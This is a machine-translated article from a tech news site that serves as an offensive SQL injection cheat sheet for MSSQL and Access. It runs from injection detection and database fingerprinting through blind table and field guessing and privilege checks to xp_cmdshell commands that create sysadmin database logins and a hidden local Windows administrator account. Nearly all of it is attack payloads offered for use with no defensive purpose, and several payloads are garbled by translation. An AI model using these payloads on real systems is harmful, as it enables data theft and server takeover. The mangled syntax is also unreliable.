In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-02-24 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
1. To determine whether there is injection.
And 1 # 1
And 1: 2
The method of judging injection is the same.
two。 To determine whether it is mssql or not.
And user > 0
3. Judge database system
And (select count (*) from sysobjects) > 0 mssql
And (select count (*) from msysobjects) > 0 access
4. The injection parameter is a character
'and [query criteria] and'='
5. There are no filter parameters when searching.
'and [query criteria] and'25 query conditions'
6. Guess the table name
And (select Count (*) from [table name]) > 0
This is more painful, a total of 3oo multiple databases I did not guess by hand, there is an artifact sqlmap running endless display, just returned an error, if you fill in the correct table name on the line, the following is a guess field, in fact, and access database do not understand, to learn this will have to draw examples, these are some steps and sentences, I will show you, mainly because this station is more painful The use of tools will be introduced in later tutorials. To learn this, you must first learn the principle, but only know that it is meaningless to inject it with the tool. You should learn the principle, have your own ideas, and then write your own tools before you have a sense of achievement.
7. Guess field
And (select Count) from table name) > 0
8. Guess the length of the record in the field
And (select top 1 len (field name) from table name) > 0
9. (1) guess the ascii value of the field (access)
And (select top 1 asc (mid (field name, 1memo 1)) from table name) > 0
(2) guess the ascii value of the field (mssql)
And (select top 1 unicode (substring (field name, 1memo 1)) from table name) > 0
10. Test permission structure (mssql)
And 1 = (select IS_SRVROLEMEMBER ('sysadmin'));
And 1 = (select IS_SRVROLEMEMBER ('serveradmin'));
And 1 = (select IS_SRVROLEMEMBER ('setupadmin'));
And 1 = (select IS_SRVROLEMEMBER ('securityadmin'));
And 1 = (select IS_SRVROLEMEMBER ('diskadmin'));
And 1 = (select IS_SRVROLEMEMBER ('bulkadmin'));
And 1 = (select IS_MEMBER ('db_owner'));
11. Add accounts for mssql and system
Exec master.dbo.sp_addlogin username;--
Exec master.dbo.sp_password null,username,password;--
Exec master.dbo.sp_addsrvrolemember sysadmin username;--
Exec master.dbo.xp_cmdshell 'net user username password / workstations:* / times:all / passwordchg:yes / passwordreq:yes / active:yes / add';--
Exec master.dbo.xp_cmdshell 'net user username password / add';--
Exec master.dbo.xp_cmdshell 'net localgroup administrators username / add';--
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
